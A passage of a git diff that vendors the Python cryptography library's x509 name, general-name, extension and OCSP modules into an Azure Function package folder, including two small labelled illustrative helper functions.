+            and self.only_contains_user_certs == other.only_contains_user_certs
+            and self.only_contains_ca_certs == other.only_contains_ca_certs
+            and self.only_some_reasons == other.only_some_reasons
+            and self.indirect_crl == other.indirect_crl
+            and self.only_contains_attribute_certs
+            == other.only_contains_attribute_certs
+        )
+
+    def __hash__(self) -> int:
+        return hash(
+            (
+                self.full_name,
+                self.relative_name,
+                self.only_contains_user_certs,
+                self.only_contains_ca_certs,
+                self.only_some_reasons,
+                self.indirect_crl,
+                self.only_contains_attribute_certs,
+            )
+        )
+
+    @property
+    def full_name(self) -> typing.Optional[typing.List[GeneralName]]:
+        return self._full_name
+
+    @property
+    def relative_name(self) -> typing.Optional[RelativeDistinguishedName]:
+        return self._relative_name
+
+    @property
+    def only_contains_user_certs(self) -> bool:
+        return self._only_contains_user_certs
+
+    @property
+    def only_contains_ca_certs(self) -> bool:
+        return self._only_contains_ca_certs
+
+    @property
+    def only_some_reasons(
+        self,
+    ) -> typing.Optional[typing.FrozenSet[ReasonFlags]]:
+        return self._only_some_reasons
+
+    @property
+    def indirect_crl(self) -> bool:
+        return self._indirect_crl
+
+    @property
+    def only_contains_attribute_certs(self) -> bool:
+        return self._only_contains_attribute_certs
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
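+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# a CRL scoped to end-entity certificates, distributed at a hypothetical URL.
+# At most one of the only_contains_*/indirect_crl booleans may be True.
+def _example_issuing_distribution_point() -> IssuingDistributionPoint:
+    return IssuingDistributionPoint(
+        full_name=[UniformResourceIdentifier("http://crl.example.com/ee.crl")],
+        relative_name=None,
+        only_contains_user_certs=True,
+        only_contains_ca_certs=False,
+        only_some_reasons=None,
+        indirect_crl=False,
+        only_contains_attribute_certs=False,
+    )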
+
+
+class UnrecognizedExtension(ExtensionType):
+    def __init__(self, oid: ObjectIdentifier, value: bytes) -> None:
+        if not isinstance(oid, ObjectIdentifier):
+            raise TypeError("oid must be an ObjectIdentifier")
+        self._oid = oid
+        self._value = value
+
+    @property
+    def oid(self) -> ObjectIdentifier:  # type: ignore[override]
+        return self._oid
+
+    @property
+    def value(self) -> bytes:
+        return self._value
+
+    def __repr__(self) -> str:
+        return (
+            "<UnrecognizedExtension(oid={0.oid}, "
+            "value={0.value!r})>".format(self)
+        )
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, UnrecognizedExtension):
+            return NotImplemented
+
+        return self.oid == other.oid and self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash((self.oid, self.value))
+
+    def public_bytes(self) -> bytes:
+        return self.value
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py
new file mode 100644
index 0000000..eadf0bb
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py
@@ -0,0 +1,284 @@
+# This file is dual licensed under the terms of the Apache License, Version
+# 2.0, and the BSD License. See the LICENSE file in the root of this repository
+# for complete details.
+
+
+import abc
+import ipaddress
+import typing
+from email.utils import parseaddr
+
+from cryptography.x509.name import Name
+from cryptography.x509.oid import ObjectIdentifier
+
+
+_IPADDRESS_TYPES = typing.Union[
+    ipaddress.IPv4Address,
+    ipaddress.IPv6Address,
+    ipaddress.IPv4Network,
+    ipaddress.IPv6Network,
+]
+
+
+class UnsupportedGeneralNameType(Exception):
+    pass
+
+
+class GeneralName(metaclass=abc.ABCMeta):
+    @abc.abstractproperty
+    def value(self) -> typing.Any:
+        """
+        Return the value of the object
+        """
+
+
+class RFC822Name(GeneralName):
+    def __init__(self, value: str) -> None:
+        if isinstance(value, str):
+            try:
+                value.encode("ascii")
+            except UnicodeEncodeError:
+                raise ValueError(
+                    "RFC822Name values should be passed as an A-label string. "
+                    "This means unicode characters should be encoded via "
+                    "a library like idna."
+                )
+        else:
+            raise TypeError("value must be string")
+
+        name, address = parseaddr(value)
+        if name or not address:
+            # parseaddr has found a name (e.g. Name <email>) or the entire
+            # value is an empty string.
+            raise ValueError("Invalid rfc822name value")
+
+        self._value = value
+
+    @property
+    def value(self) -> str:
+        return self._value
+
+    @classmethod
+    def _init_without_validation(cls, value: str) -> "RFC822Name":
+        instance = cls.__new__(cls)
+        instance._value = value
+        return instance
+
+    def __repr__(self) -> str:
+        return "<RFC822Name(value={!r})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, RFC822Name):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
+
+
+class DNSName(GeneralName):
+    def __init__(self, value: str) -> None:
+        if isinstance(value, str):
+            try:
+                value.encode("ascii")
+            except UnicodeEncodeError:
+                raise ValueError(
+                    "DNSName values should be passed as an A-label string. "
+                    "This means unicode characters should be encoded via "
+                    "a library like idna."
+                )
+        else:
+            raise TypeError("value must be string")
+
+        self._value = value
+
+    @property
+    def value(self) -> str:
+        return self._value
+
+    @classmethod
+    def _init_without_validation(cls, value: str) -> "DNSName":
+        instance = cls.__new__(cls)
+        instance._value = value
+        return instance
+
+    def __repr__(self) -> str:
+        return "<DNSName(value={!r})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, DNSName):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
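+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# non-ASCII names must be IDNA-encoded to an A-label before constructing a
+# DNSName; the encoded form below is what "bücher.example" maps to.
+def _example_a_label() -> DNSName:
+    # e.g. "bücher.example".encode("idna") == b"xn--bcher-kva.example"
+    return DNSName("xn--bcher-kva.example")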
+
+
+class UniformResourceIdentifier(GeneralName):
+    def __init__(self, value: str) -> None:
+        if isinstance(value, str):
+            try:
+                value.encode("ascii")
+            except UnicodeEncodeError:
+                raise ValueError(
+                    "URI values should be passed as an A-label string. "
+                    "This means unicode characters should be encoded via "
+                    "a library like idna."
+                )
+        else:
+            raise TypeError("value must be string")
+
+        self._value = value
+
+    @property
+    def value(self) -> str:
+        return self._value
+
+    @classmethod
+    def _init_without_validation(
+        cls, value: str
+    ) -> "UniformResourceIdentifier":
+        instance = cls.__new__(cls)
+        instance._value = value
+        return instance
+
+    def __repr__(self) -> str:
+        return "<UniformResourceIdentifier(value={!r})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, UniformResourceIdentifier):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
+
+
+class DirectoryName(GeneralName):
+    def __init__(self, value: Name) -> None:
+        if not isinstance(value, Name):
+            raise TypeError("value must be a Name")
+
+        self._value = value
+
+    @property
+    def value(self) -> Name:
+        return self._value
+
+    def __repr__(self) -> str:
+        return "<DirectoryName(value={})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, DirectoryName):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
+
+
+class RegisteredID(GeneralName):
+    def __init__(self, value: ObjectIdentifier) -> None:
+        if not isinstance(value, ObjectIdentifier):
+            raise TypeError("value must be an ObjectIdentifier")
+
+        self._value = value
+
+    @property
+    def value(self) -> ObjectIdentifier:
+        return self._value
+
+    def __repr__(self) -> str:
+        return "<RegisteredID(value={})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, RegisteredID):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
+
+
+class IPAddress(GeneralName):
+    def __init__(self, value: _IPADDRESS_TYPES) -> None:
+        if not isinstance(
+            value,
+            (
+                ipaddress.IPv4Address,
+                ipaddress.IPv6Address,
+                ipaddress.IPv4Network,
+                ipaddress.IPv6Network,
+            ),
+        ):
+            raise TypeError(
+                "value must be an instance of ipaddress.IPv4Address, "
+                "ipaddress.IPv6Address, ipaddress.IPv4Network, or "
+                "ipaddress.IPv6Network"
+            )
+
+        self._value = value
+
+    @property
+    def value(self) -> _IPADDRESS_TYPES:
+        return self._value
+
+    def _packed(self) -> bytes:
+        if isinstance(
+            self.value, (ipaddress.IPv4Address, ipaddress.IPv6Address)
+        ):
+            return self.value.packed
+        else:
+            return (
+                self.value.network_address.packed + self.value.netmask.packed
+            )
+
+    def __repr__(self) -> str:
+        return "<IPAddress(value={})>".format(self.value)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, IPAddress):
+            return NotImplemented
+
+        return self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash(self.value)
+
+
+class OtherName(GeneralName):
+    def __init__(self, type_id: ObjectIdentifier, value: bytes) -> None:
+        if not isinstance(type_id, ObjectIdentifier):
+            raise TypeError("type_id must be an ObjectIdentifier")
+        if not isinstance(value, bytes):
+            raise TypeError("value must be a binary string")
+
+        self._type_id = type_id
+        self._value = value
+
+    @property
+    def type_id(self) -> ObjectIdentifier:
+        return self._type_id
+
+    @property
+    def value(self) -> bytes:
+        return self._value
+
+    def __repr__(self) -> str:
+        return "<OtherName(type_id={}, value={!r})>".format(
+            self.type_id, self.value
+        )
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, OtherName):
+            return NotImplemented
+
+        return self.type_id == other.type_id and self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash((self.type_id, self.value))
diff --git
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py new file mode 100644 index 0000000..381f54b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py @@ -0,0 +1,445 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import binascii +import re +import sys +import typing +import warnings + +from cryptography import utils +from cryptography.hazmat.bindings._rust import ( + x509 as rust_x509, +) +from cryptography.x509.oid import NameOID, ObjectIdentifier + + +class _ASN1Type(utils.Enum): + BitString = 3 + OctetString = 4 + UTF8String = 12 + NumericString = 18 + PrintableString = 19 + T61String = 20 + IA5String = 22 + UTCTime = 23 + GeneralizedTime = 24 + VisibleString = 26 + UniversalString = 28 + BMPString = 30 + + +_ASN1_TYPE_TO_ENUM = {i.value: i for i in _ASN1Type} +_NAMEOID_DEFAULT_TYPE: typing.Dict[ObjectIdentifier, _ASN1Type] = { + NameOID.COUNTRY_NAME: _ASN1Type.PrintableString, + NameOID.JURISDICTION_COUNTRY_NAME: _ASN1Type.PrintableString, + NameOID.SERIAL_NUMBER: _ASN1Type.PrintableString, + NameOID.DN_QUALIFIER: _ASN1Type.PrintableString, + NameOID.EMAIL_ADDRESS: _ASN1Type.IA5String, + NameOID.DOMAIN_COMPONENT: _ASN1Type.IA5String, +} + +# Type alias +_OidNameMap = typing.Mapping[ObjectIdentifier, str] + +#: Short attribute names from RFC 4514: +#: https://tools.ietf.org/html/rfc4514#page-7 +_NAMEOID_TO_NAME: _OidNameMap = { + NameOID.COMMON_NAME: "CN", + NameOID.LOCALITY_NAME: "L", + NameOID.STATE_OR_PROVINCE_NAME: "ST", + NameOID.ORGANIZATION_NAME: "O", + NameOID.ORGANIZATIONAL_UNIT_NAME: "OU", + NameOID.COUNTRY_NAME: "C", + NameOID.STREET_ADDRESS: "STREET", + NameOID.DOMAIN_COMPONENT: "DC", + NameOID.USER_ID: "UID", +} +_NAME_TO_NAMEOID = {v: k for k, v in _NAMEOID_TO_NAME.items()} + + +def _escape_dn_value(val: typing.Union[str, bytes]) -> str: + """Escape special characters in RFC4514 Distinguished Name value.""" + + if not val: + return "" + + # RFC 4514 Section 2.4 defines the value as being the # (U+0023) character + # followed by the hexadecimal encoding of the octets. 
+    if isinstance(val, bytes):
+        return "#" + binascii.hexlify(val).decode("utf8")
+
+    # See https://tools.ietf.org/html/rfc4514#section-2.4
+    val = val.replace("\\", "\\\\")
+    val = val.replace('"', '\\"')
+    val = val.replace("+", "\\+")
+    val = val.replace(",", "\\,")
+    val = val.replace(";", "\\;")
+    val = val.replace("<", "\\<")
+    val = val.replace(">", "\\>")
+    val = val.replace("\0", "\\00")
+
+    if val[0] in ("#", " "):
+        val = "\\" + val
+    if val[-1] == " ":
+        val = val[:-1] + "\\ "
+
+    return val
+
+
+def _unescape_dn_value(val: str) -> str:
+    if not val:
+        return ""
+
+    # See https://tools.ietf.org/html/rfc4514#section-3
+
+    # special = escaped / SPACE / SHARP / EQUALS
+    # escaped = DQUOTE / PLUS / COMMA / SEMI / LANGLE / RANGLE
+    def sub(m):
+        val = m.group(1)
+        # Regular escape
+        if len(val) == 1:
+            return val
+        # Hex-value escape
+        return chr(int(val, 16))
+
+    return _RFC4514NameParser._PAIR_RE.sub(sub, val)
+
+
+class NameAttribute:
+    def __init__(
+        self,
+        oid: ObjectIdentifier,
+        value: typing.Union[str, bytes],
+        _type: typing.Optional[_ASN1Type] = None,
+        *,
+        _validate: bool = True,
+    ) -> None:
+        if not isinstance(oid, ObjectIdentifier):
+            raise TypeError(
+                "oid argument must be an ObjectIdentifier instance."
+            )
+        if _type == _ASN1Type.BitString:
+            if oid != NameOID.X500_UNIQUE_IDENTIFIER:
+                raise TypeError(
+                    "oid must be X500_UNIQUE_IDENTIFIER for BitString type."
+                )
+            if not isinstance(value, bytes):
+                raise TypeError("value must be bytes for BitString")
+        else:
+            if not isinstance(value, str):
+                raise TypeError("value argument must be a str")
+
+        if (
+            oid == NameOID.COUNTRY_NAME
+            or oid == NameOID.JURISDICTION_COUNTRY_NAME
+        ):
+            assert isinstance(value, str)
+            c_len = len(value.encode("utf8"))
+            if c_len != 2 and _validate is True:
+                raise ValueError(
+                    "Country name must be a 2 character country code"
+                )
+            elif c_len != 2:
+                warnings.warn(
+                    "Country names should be two characters, but the "
+                    "attribute is {} characters in length.".format(c_len),
+                    stacklevel=2,
+                )
+
+        # The appropriate ASN1 string type varies by OID and is defined across
+        # multiple RFCs including 2459, 3280, and 5280. In general UTF8String
+        # is preferred (2459), but 3280 and 5280 specify several OIDs with
+        # alternate types. This means when we see the sentinel value we need
+        # to look up whether the OID has a non-UTF8 type. If it does, set it
+        # to that. Otherwise, UTF8!
+        if _type is None:
+            _type = _NAMEOID_DEFAULT_TYPE.get(oid, _ASN1Type.UTF8String)
+
+        if not isinstance(_type, _ASN1Type):
+            raise TypeError("_type must be from the _ASN1Type enum")
+
+        self._oid = oid
+        self._value = value
+        self._type = _type
+
+    @property
+    def oid(self) -> ObjectIdentifier:
+        return self._oid
+
+    @property
+    def value(self) -> typing.Union[str, bytes]:
+        return self._value
+
+    @property
+    def rfc4514_attribute_name(self) -> str:
+        """
+        The short attribute name (for example "CN") if available,
+        otherwise the OID dotted string.
+        """
+        return _NAMEOID_TO_NAME.get(self.oid, self.oid.dotted_string)
+
+    def rfc4514_string(
+        self, attr_name_overrides: typing.Optional[_OidNameMap] = None
+    ) -> str:
+        """
+        Format as RFC4514 Distinguished Name string.
+
+        Use short attribute name if available, otherwise fall back to OID
+        dotted string.
+        """
+        attr_name = (
+            attr_name_overrides.get(self.oid) if attr_name_overrides else None
+        )
+        if attr_name is None:
+            attr_name = self.rfc4514_attribute_name
+
+        return f"{attr_name}={_escape_dn_value(self.value)}"
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, NameAttribute):
+            return NotImplemented
+
+        return self.oid == other.oid and self.value == other.value
+
+    def __hash__(self) -> int:
+        return hash((self.oid, self.value))
+
+    def __repr__(self) -> str:
+        return "<NameAttribute(oid={0.oid}, value={0.value!r})>".format(self)
+ """ + attr_name = ( + attr_name_overrides.get(self.oid) if attr_name_overrides else None + ) + if attr_name is None: + attr_name = self.rfc4514_attribute_name + + return f"{attr_name}={_escape_dn_value(self.value)}" + + def __eq__(self, other: object) -> bool: + if not isinstance(other, NameAttribute): + return NotImplemented + + return self.oid == other.oid and self.value == other.value + + def __hash__(self) -> int: + return hash((self.oid, self.value)) + + def __repr__(self) -> str: + return "".format(self) + + +class RelativeDistinguishedName: + def __init__(self, attributes: typing.Iterable[NameAttribute]): + attributes = list(attributes) + if not attributes: + raise ValueError("a relative distinguished name cannot be empty") + if not all(isinstance(x, NameAttribute) for x in attributes): + raise TypeError("attributes must be an iterable of NameAttribute") + + # Keep list and frozenset to preserve attribute order where it matters + self._attributes = attributes + self._attribute_set = frozenset(attributes) + + if len(self._attribute_set) != len(attributes): + raise ValueError("duplicate attributes are not allowed") + + def get_attributes_for_oid( + self, oid: ObjectIdentifier + ) -> typing.List[NameAttribute]: + return [i for i in self if i.oid == oid] + + def rfc4514_string( + self, attr_name_overrides: typing.Optional[_OidNameMap] = None + ) -> str: + """ + Format as RFC4514 Distinguished Name string. + + Within each RDN, attributes are joined by '+', although that is rarely + used in certificates. + """ + return "+".join( + attr.rfc4514_string(attr_name_overrides) + for attr in self._attributes + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RelativeDistinguishedName): + return NotImplemented + + return self._attribute_set == other._attribute_set + + def __hash__(self) -> int: + return hash(self._attribute_set) + + def __iter__(self) -> typing.Iterator[NameAttribute]: + return iter(self._attributes) + + def __len__(self) -> int: + return len(self._attributes) + + def __repr__(self) -> str: + return "".format(self.rfc4514_string()) + + +class Name: + @typing.overload + def __init__(self, attributes: typing.Iterable[NameAttribute]) -> None: + ... + + @typing.overload + def __init__( + self, attributes: typing.Iterable[RelativeDistinguishedName] + ) -> None: + ... + + def __init__( + self, + attributes: typing.Iterable[ + typing.Union[NameAttribute, RelativeDistinguishedName] + ], + ) -> None: + attributes = list(attributes) + if all(isinstance(x, NameAttribute) for x in attributes): + self._attributes = [ + RelativeDistinguishedName([typing.cast(NameAttribute, x)]) + for x in attributes + ] + elif all(isinstance(x, RelativeDistinguishedName) for x in attributes): + self._attributes = typing.cast( + typing.List[RelativeDistinguishedName], attributes + ) + else: + raise TypeError( + "attributes must be a list of NameAttribute" + " or a list RelativeDistinguishedName" + ) + + @classmethod + def from_rfc4514_string(cls, data: str) -> "Name": + return _RFC4514NameParser(data).parse() + + def rfc4514_string( + self, attr_name_overrides: typing.Optional[_OidNameMap] = None + ) -> str: + """ + Format as RFC4514 Distinguished Name string. + For example 'CN=foobar.com,O=Foo Corp,C=US' + + An X.509 name is a two-level structure: a list of sets of attributes. + Each list element is separated by ',' and within each list element, set + elements are separated by '+'. The latter is almost never used in + real world certificates. 
+
+
+class Name:
+    @typing.overload
+    def __init__(self, attributes: typing.Iterable[NameAttribute]) -> None:
+        ...
+
+    @typing.overload
+    def __init__(
+        self, attributes: typing.Iterable[RelativeDistinguishedName]
+    ) -> None:
+        ...
+
+    def __init__(
+        self,
+        attributes: typing.Iterable[
+            typing.Union[NameAttribute, RelativeDistinguishedName]
+        ],
+    ) -> None:
+        attributes = list(attributes)
+        if all(isinstance(x, NameAttribute) for x in attributes):
+            self._attributes = [
+                RelativeDistinguishedName([typing.cast(NameAttribute, x)])
+                for x in attributes
+            ]
+        elif all(isinstance(x, RelativeDistinguishedName) for x in attributes):
+            self._attributes = typing.cast(
+                typing.List[RelativeDistinguishedName], attributes
+            )
+        else:
+            raise TypeError(
+                "attributes must be a list of NameAttribute"
+                " or a list of RelativeDistinguishedName"
+            )
+
+    @classmethod
+    def from_rfc4514_string(cls, data: str) -> "Name":
+        return _RFC4514NameParser(data).parse()
+
+    def rfc4514_string(
+        self, attr_name_overrides: typing.Optional[_OidNameMap] = None
+    ) -> str:
+        """
+        Format as RFC4514 Distinguished Name string.
+        For example 'CN=foobar.com,O=Foo Corp,C=US'
+
+        An X.509 name is a two-level structure: a list of sets of attributes.
+        Each list element is separated by ',' and within each list element,
+        set elements are separated by '+'. The latter is almost never used in
+        real world certificates. According to RFC4514 section 2.1 the
+        RDNSequence must be reversed when converting to string representation.
+        """
+        return ",".join(
+            attr.rfc4514_string(attr_name_overrides)
+            for attr in reversed(self._attributes)
+        )
+
+    def get_attributes_for_oid(
+        self, oid: ObjectIdentifier
+    ) -> typing.List[NameAttribute]:
+        return [i for i in self if i.oid == oid]
+
+    @property
+    def rdns(self) -> typing.List[RelativeDistinguishedName]:
+        return self._attributes
+
+    def public_bytes(self, backend: typing.Any = None) -> bytes:
+        return rust_x509.encode_name_bytes(self)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Name):
+            return NotImplemented
+
+        return self._attributes == other._attributes
+
+    def __hash__(self) -> int:
+        # TODO: this is relatively expensive, if this looks like a bottleneck
+        # for you, consider optimizing!
+        return hash(tuple(self._attributes))
+
+    def __iter__(self) -> typing.Iterator[NameAttribute]:
+        for rdn in self._attributes:
+            for ava in rdn:
+                yield ava
+
+    def __len__(self) -> int:
+        return sum(len(rdn) for rdn in self._attributes)
+
+    def __repr__(self) -> str:
+        rdns = ",".join(attr.rfc4514_string() for attr in self._attributes)
+        return "<Name({})>".format(rdns)
+
+
+class _RFC4514NameParser:
+    _OID_RE = re.compile(r"(0|([1-9]\d*))(\.(0|([1-9]\d*)))+")
+    _DESCR_RE = re.compile(r"[a-zA-Z][a-zA-Z\d-]*")
+
+    _PAIR = r"\\([\\ #=\"\+,;<>]|[\da-zA-Z]{2})"
+    _PAIR_RE = re.compile(_PAIR)
+    _LUTF1 = r"[\x01-\x1f\x21\x24-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]"
+    _SUTF1 = r"[\x01-\x21\x23-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]"
+    _TUTF1 = r"[\x01-\x1F\x21\x23-\x2A\x2D-\x3A\x3D\x3F-\x5B\x5D-\x7F]"
+    _UTFMB = rf"[\x80-{chr(sys.maxunicode)}]"
+    _LEADCHAR = rf"{_LUTF1}|{_UTFMB}"
+    _STRINGCHAR = rf"{_SUTF1}|{_UTFMB}"
+    _TRAILCHAR = rf"{_TUTF1}|{_UTFMB}"
+    _STRING_RE = re.compile(
+        rf"""
+        (
+            ({_LEADCHAR}|{_PAIR})
+            (
+                ({_STRINGCHAR}|{_PAIR})*
+                ({_TRAILCHAR}|{_PAIR})
+            )?
+        )?
+ """, + re.VERBOSE, + ) + _HEXSTRING_RE = re.compile(r"#([\da-zA-Z]{2})+") + + def __init__(self, data: str) -> None: + self._data = data + self._idx = 0 + + def _has_data(self) -> bool: + return self._idx < len(self._data) + + def _peek(self) -> typing.Optional[str]: + if self._has_data(): + return self._data[self._idx] + return None + + def _read_char(self, ch: str) -> None: + if self._peek() != ch: + raise ValueError + self._idx += 1 + + def _read_re(self, pat) -> str: + match = pat.match(self._data, pos=self._idx) + if match is None: + raise ValueError + val = match.group() + self._idx += len(val) + return val + + def parse(self) -> Name: + rdns = [self._parse_rdn()] + + while self._has_data(): + self._read_char(",") + rdns.append(self._parse_rdn()) + + return Name(rdns) + + def _parse_rdn(self) -> RelativeDistinguishedName: + nas = [self._parse_na()] + while self._peek() == "+": + self._read_char("+") + nas.append(self._parse_na()) + + return RelativeDistinguishedName(nas) + + def _parse_na(self) -> NameAttribute: + try: + oid_value = self._read_re(self._OID_RE) + except ValueError: + name = self._read_re(self._DESCR_RE) + oid = _NAME_TO_NAMEOID.get(name) + if oid is None: + raise ValueError + else: + oid = ObjectIdentifier(oid_value) + + self._read_char("=") + if self._peek() == "#": + value = self._read_re(self._HEXSTRING_RE) + value = binascii.unhexlify(value[1:]).decode() + else: + raw_value = self._read_re(self._STRING_RE) + value = _unescape_dn_value(raw_value) + + return NameAttribute(oid, value) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py new file mode 100644 index 0000000..ff7f1d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/ocsp.py @@ -0,0 +1,551 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +import abc +import datetime +import typing + +from cryptography import utils +from cryptography import x509 +from cryptography.hazmat.bindings._rust import ocsp +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_PRIVATE_KEY_TYPES, +) +from cryptography.x509.base import ( + _EARLIEST_UTC_TIME, + _convert_to_naive_utc_time, + _reject_duplicate_extension, +) + + +class OCSPResponderEncoding(utils.Enum): + HASH = "By Hash" + NAME = "By Name" + + +class OCSPResponseStatus(utils.Enum): + SUCCESSFUL = 0 + MALFORMED_REQUEST = 1 + INTERNAL_ERROR = 2 + TRY_LATER = 3 + SIG_REQUIRED = 5 + UNAUTHORIZED = 6 + + +_ALLOWED_HASHES = ( + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, +) + + +def _verify_algorithm(algorithm: hashes.HashAlgorithm) -> None: + if not isinstance(algorithm, _ALLOWED_HASHES): + raise ValueError( + "Algorithm must be SHA1, SHA224, SHA256, SHA384, or SHA512" + ) + + +class OCSPCertStatus(utils.Enum): + GOOD = 0 + REVOKED = 1 + UNKNOWN = 2 + + +class _SingleResponse: + def __init__( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + cert_status: OCSPCertStatus, + this_update: datetime.datetime, + next_update: typing.Optional[datetime.datetime], + revocation_time: typing.Optional[datetime.datetime], + revocation_reason: typing.Optional[x509.ReasonFlags], + ): + if not isinstance(cert, x509.Certificate) or not isinstance( + issuer, x509.Certificate + ): + raise TypeError("cert and issuer must be a Certificate") + + _verify_algorithm(algorithm) + if not isinstance(this_update, datetime.datetime): + raise TypeError("this_update must be a datetime object") + if next_update is not None and not isinstance( + next_update, datetime.datetime + ): + raise TypeError("next_update must be a datetime object or None") + + self._cert = cert + self._issuer = issuer + self._algorithm = algorithm + self._this_update = this_update + self._next_update = next_update + + if not isinstance(cert_status, OCSPCertStatus): + raise TypeError( + "cert_status must be an item from the OCSPCertStatus enum" + ) + if cert_status is not OCSPCertStatus.REVOKED: + if revocation_time is not None: + raise ValueError( + "revocation_time can only be provided if the certificate " + "is revoked" + ) + if revocation_reason is not None: + raise ValueError( + "revocation_reason can only be provided if the certificate" + " is revoked" + ) + else: + if not isinstance(revocation_time, datetime.datetime): + raise TypeError("revocation_time must be a datetime object") + + revocation_time = _convert_to_naive_utc_time(revocation_time) + if revocation_time < _EARLIEST_UTC_TIME: + raise ValueError( + "The revocation_time must be on or after" + " 1950 January 1." 
+ ) + + if revocation_reason is not None and not isinstance( + revocation_reason, x509.ReasonFlags + ): + raise TypeError( + "revocation_reason must be an item from the ReasonFlags " + "enum or None" + ) + + self._cert_status = cert_status + self._revocation_time = revocation_time + self._revocation_reason = revocation_reason + + +class OCSPRequest(metaclass=abc.ABCMeta): + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the request to DER + """ + + @abc.abstractproperty + def extensions(self) -> x509.Extensions: + """ + The list of request extensions. Not single request extensions. + """ + + +class OCSPSingleResponse(metaclass=abc.ABCMeta): + @abc.abstractproperty + def certificate_status(self) -> OCSPCertStatus: + """ + The status of the certificate (an element from the OCSPCertStatus enum) + """ + + @abc.abstractproperty + def revocation_time(self) -> typing.Optional[datetime.datetime]: + """ + The date of when the certificate was revoked or None if not + revoked. + """ + + @abc.abstractproperty + def revocation_reason(self) -> typing.Optional[x509.ReasonFlags]: + """ + The reason the certificate was revoked or None if not specified or + not revoked. + """ + + @abc.abstractproperty + def this_update(self) -> datetime.datetime: + """ + The most recent time at which the status being indicated is known by + the responder to have been correct + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + The time when newer information will be available + """ + + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + +class OCSPResponse(metaclass=abc.ABCMeta): + @abc.abstractproperty + def responses(self) -> typing.Iterator[OCSPSingleResponse]: + """ + An iterator over the individual SINGLERESP structures in the + response + """ + + @abc.abstractproperty + def response_status(self) -> OCSPResponseStatus: + """ + The status of the response. 
